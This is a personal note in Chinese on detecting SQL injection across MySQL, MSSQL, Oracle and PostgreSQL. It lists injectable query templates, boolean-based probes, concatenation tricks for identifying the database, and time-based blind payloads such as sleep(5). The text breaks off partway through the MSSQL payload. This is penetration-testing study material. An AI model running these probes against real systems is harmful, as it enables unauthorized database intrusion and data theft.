前言
本文叙述了在Mysql、MSsql、Oracle、PostgreSQL平台下的sql注入探测方式与利用,作为个人笔记,没有框架以及中间件的参与。
文章的内容并不全面,日后有接触新的方法会有补充。
探测方法
首先贴出增删改查的基本语句,加粗部分为用户可控:
mysql:
select item from table where valuelike db_value;
select item1,item2 from table where '**value1'**like db_value order by '**value2'**limit value3;
update table set db_value1=‘value1’,db_value2=value2where 'value3'=db_value3;
insert into table set item1='value1',item2=value2;
delete from table where item=value1order by value2;
mssql:
select item from table where valuelike db_value;
select item1,item2 from(
select item1,item2,row_number()over(order by 'value1') as num from table) as tablename
where num between value2and value3;update table set db_value1=‘value1’,db_value2=value2 where 'value3'=db_value3;
insert into table (item1,item2) values ('value1',value2);
delete table where item=value1order by value2;
oracle:
select item from table where valuelike db_value;
select item1,item2 from
(select rownum r,item1,item2 from
(select item1,item2 from table2 order by value1) table
where rownum <=value2) table1 where r>value3;update table set db_value1=‘value1’,db_value2=value2where 'value3'=db_value3;
insert into table (item1,item2) values ('value1',value2);
delete table where item=value1order by value2;
postgresql:
select item from table where valuelike db_value;
select item from table limit value1offset value2;
update table set db_value1=‘value1’,db_value2=value2where 'value3'=db_value3;
insert into table (item1,item2) values ('value1',value2);
delete table where item=value1order by value2;
然后是探测步骤和语句:
这些语句分开的时候感觉都一样,但是把上面的语句加粗的地方替换成探测语句就很明显了。
1.首先输入单引号、双引号,或者分号、小括号加引号
如果后两个响应的结果与第一个不同(或者报错),则进入下一步测试,若结果有差异,基本可以确定是布尔类型的注入;
p=value
p=value' -> p=' and '1'=1' => p=' and '1'=2'
p=value" -> p=" and "1"=1" => p=" and "1"=2"
2.然后往payload中插入字符串连接符,判断数据库类型;
p=value
p=val' 'ue -> mysql
p=val'+'ue -> mssql
p=val'||'ue -> oracle、postgresql
3.如果上面的探测没有得到结果的话就可以尝试延时盲注,通过响应的延时情况判断是否存在注入;
mysql:p=' and sleep(5)#
mssql:p=' if ascii(...)&#